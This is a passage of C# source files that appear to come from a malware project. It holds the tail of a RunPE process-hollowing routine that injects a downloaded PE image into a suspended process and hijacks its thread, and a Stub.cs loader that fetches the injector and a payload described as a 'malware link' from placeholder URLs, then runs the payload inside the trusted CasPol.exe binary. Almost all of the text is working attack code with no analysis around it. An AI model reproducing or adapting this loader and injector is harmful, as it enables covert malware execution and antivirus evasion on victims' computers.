| 88 | return false; 89 | } // Run 90 | private static bool HandleRun(string path, string cmd, byte[] data, bool compatible) 91 | { 92 | int ReadWrite = 0; 93 | string QuotedPath = string.Format("\"{0}\"", path); 94 | 95 | STARTUP_INFORMATION SI = new STARTUP_INFORMATION(); 96 | PROCESS_INFORMATION PI = new PROCESS_INFORMATION(); 97 | 98 | SI.FLAGSS = 0; 99 | SI.Size_ = System.Convert.ToUInt32(System.Runtime.InteropServices.Marshal.SizeOf(typeof(STARTUP_INFORMATION))); 100 | 101 | try 102 | { 103 | if (!string.IsNullOrEmpty(cmd)) 104 | QuotedPath = QuotedPath + " " + cmd; 105 | 106 | if (!CreateProcess_API(path, QuotedPath, System.IntPtr.Zero, System.IntPtr.Zero, false, 4, System.IntPtr.Zero, null, ref SI, ref PI)) 107 | throw new System.Exception(); 108 | 109 | int FileAddress = System.BitConverter.ToInt32(data, 60); 110 | int ImageBase = System.BitConverter.ToInt32(data, FileAddress + 52); 111 | 112 | int[] Context_ = new int[179]; 113 | Context_[0] = 65538; 114 | 115 | if (System.IntPtr.Size == 4) 116 | { 117 | if (!GetThreadContext_API(PI.TihradHandle, Context_)) 118 | throw new System.Exception(); 119 | } 120 | else if (!Wow64GetThreadContext_API(PI.TihradHandle, Context_)) 121 | throw new System.Exception(); 122 | 123 | int Ebx = Context_[41]; 124 | int BaseAddress = 0; 125 | 126 | if (!ReadProcessMemory_API(PI.HasanHandle, Ebx + 8, ref BaseAddress, 4, ref ReadWrite)) 127 | throw new System.Exception(); 128 | 129 | if (ImageBase == BaseAddress) //Developer İntrusive 130 | { 131 | if (!(NtUnmapViewOfSection_API(PI.HasanHandle, BaseAddress) == 0)) 132 | throw new System.Exception(); 133 | } 134 | 135 | int SizeOfImage = System.BitConverter.ToInt32(data, FileAddress + 80); 136 | int SizeOfHeaders = System.BitConverter.ToInt32(data, FileAddress + 84); 137 | 138 | bool AllowOverride = false; 139 | int NewImageBase = VirtualAllocEx_API(PI.HasanHandle, ImageBase, SizeOfImage, 12288, 64); // R1 //Developer İntrusive 140 | 141 | //Developer İntrusive //Developer İntrusive 142 | 143 | if (!compatible && NewImageBase == 0) 144 | { 145 | AllowOverride = true; 146 | NewImageBase = VirtualAllocEx_API(PI.HasanHandle, 0, SizeOfImage, 12288, 64); 147 | } 148 | 149 | if (NewImageBase == 0) 150 | throw new System.Exception(); 151 | 152 | 153 | if (!WriteProcessMemory_API(PI.HasanHandle, NewImageBase, data, SizeOfHeaders, ref ReadWrite)) 154 | throw new System.Exception(); 155 | 156 | int SectionOffset = FileAddress + 248; 157 | short NumberOfSections = System.BitConverter.ToInt16(data, FileAddress + 6); 158 | 159 | for (int fri = 0; fri <= NumberOfSections - 1; fri++) 160 | { 161 | int VirtualAddress = System.BitConverter.ToInt32(data, SectionOffset + 12); 162 | int SizeOfRawData = System.BitConverter.ToInt32(data, SectionOffset + 16); 163 | int PointerToRawData = System.BitConverter.ToInt32(data, SectionOffset + 20); 164 | 165 | if (!(SizeOfRawData == 0)) 166 | { 167 | byte[] SectionData = new byte[SizeOfRawData - 1 + 1]; 168 | System.Buffer.BlockCopy(data, PointerToRawData, SectionData, 0, SectionData.Length); 169 | 170 | if (!WriteProcessMemory_API(PI.HasanHandle, NewImageBase + VirtualAddress, SectionData, SectionData.Length, ref ReadWrite)) 171 | throw new System.Exception(); 172 | } 173 | 174 | SectionOffset += 40; 175 | } 176 | 177 | byte[] PointerData = System.BitConverter.GetBytes(NewImageBase); 178 | if (!WriteProcessMemory_API(PI.HasanHandle, Ebx + 8, PointerData, 4, ref ReadWrite)) 179 | throw new System.Exception(); 180 | 181 | int AddressOfEntryPoint = System.BitConverter.ToInt32(data, FileAddress + 40); 182 | 183 | if (AllowOverride) 184 | NewImageBase = ImageBase; 185 | Context_[44] = NewImageBase + AddressOfEntryPoint; 186 | 187 | if (System.IntPtr.Size == 4) 188 | { 189 | if (!SetThreadContext_API(PI.TihradHandle, Context_)) 190 | throw new System.Exception(); 191 | } 192 | else if (!Wow64SetThreadContext_API(PI.TihradHandle, Context_)) 193 | throw new System.Exception(); 194 | 195 | if (ResumeThread_API(PI.TihradHandle) == -1) 196 | throw new System.Exception(); 197 | } 198 | catch 199 | { 200 | System.Diagnostics.Process Pros = System.Diagnostics.Process.GetProcessById(System.Convert.ToInt32(PI._processıd)); 201 | if (Pros != null) 202 | Pros.Kill(); 203 | 204 | return false; 205 | } 206 | 207 | return true; 208 | } 209 | } 210 | 211 | } 212 | 213 | //Developer İntrusive 214 | //Developer İntrusive 215 | //Developer İntrusive 216 | //Developer İntrusive -------------------------------------------------------------------------------- /Stub.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Net; 3 | using System.Reflection; 4 | using System.Text; 5 | 6 | 7 | 8 | namespace Stub 9 | { 10 | 11 | internal static partial class Program 12 | { 13 | 14 | [STAThread] 15 | private static void Main() 16 | { 17 | 18 | ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12; 19 | 20 | 21 | WebClient webClient = new WebClient(); 22 | 23 | 24 | string rawww = Encoding.UTF8.GetString(Convert.FromBase64String("Runpe Process Hollowing Direct Link Base64 Encode")); 25 | 26 | byte[] ByrawAssembly = webClient.DownloadData(rawww); 27 | 28 | 29 | 30 | WebClient webClient2 = new WebClient(); 31 | 32 | string asdasdasdas = Encoding.UTF8.GetString(Convert.FromBase64String("Hollowing File or Malware link")); 33 | 34 | Uri address = new Uri(asdasdasdas); 35 | 36 | byte[] array6 = webClient2.DownloadData(address); 37 | object obj = new object[] 38 | { 39 | "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\CasPol.exe", 40 | string.Empty, 41 | array6, 42 | true 43 | }; 44 | string target = null; 45 | Assembly assembly = Assembly.Load(ByrawAssembly); 46 | assembly.GetType("Projectname.Classname").InvokeMember("RunMethodName", BindingFlags.InvokeMethod, null, target, (object[])obj); 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | } 55 | 56 | 57 | } 58 | } 59 | 60 | --------------------------------------------------------------------------------